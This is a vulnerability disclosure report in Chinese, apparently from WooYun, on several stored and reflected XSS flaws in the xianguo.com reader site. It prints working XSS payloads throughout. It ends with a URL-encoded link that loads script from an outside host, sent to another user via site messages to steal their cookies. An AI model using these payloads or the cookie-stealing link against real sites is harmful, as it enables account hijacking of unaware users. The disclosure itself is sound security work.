WooYun.org

1）存储型xss，这个危害你们懂的；
1.1）发布功能处存储型xss；
标题处过滤的很好，但是文本内容却忽略了<img>标签的过滤，所有发布功能文本均可插入xss code,如我们在文本内容中插入以下内容;

test<img src=0 onerror=alert(/3/)>

1.2)标签设置处存储型xss；
此处其实鲜果的同学是做了防御的，无法输入"<"；好吧，你不让输入，我就复制粘贴吧；将我们准备好的xss code直接复制过去，经过一番尝试，发现<script>标签只能弹一次便被过滤，<img>标签下的xss code则能静静躺在那里等待促发；

2）反射型xss
2.1）搜索功能处xss；
来到搜索功能处，首先输入“">”进行试探，发现直接测漏鸟；

好吧，这就好办多了，直接构造以下代码：

"><script>alert(document.cookie)</script><input

进行测试；

2.2)反馈功能处DOM+反射型xss；
点击意见反馈，我们注意到页面的特征，url里的tags内容正好与标签内容对应；

好吧，打开浏览器调试查看一番，然后直接在tags内容后插入xss code;

<script>alert(/2/)</script>

提交url请求后，直接弹出窗口；

2.3）阅读器功能函数构造反射xss；
来到阅读器的功能页面，发现如下url：

http://xianguo.com/reader#PageMgr.goIndexPage()

url里直接引用了一个函数，这里可不可以利用下呢，构造以下链接直接提交；

http://xianguo.com/reader#PageMgr.goIndexPage(alert(/xss/))

pia的一声，又弹出一个串口；

3）利用反射型xss盗取用户cookie；
3.1）不要小看了反射型xss，一定条件下也能利用起来的；
3.2）鲜果网有个站内短信功能，不知道能不能将这个功能和反射性xss结合起来发挥作用呢，将以下反射性xss的链接直接发给用户B；

http://xianguo.com/search?searchType=all&keyword=%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32%34%3E%3C%2F%73%63%72%69%70%74%3E

3.3）登陆用户B查看短信息，发现鲜果的同学未对链接中的敏感字符进行一些处理，而是直接原样传递给用户B；

3.4）如果不知情的用户，访问了我们发送的链接，那么...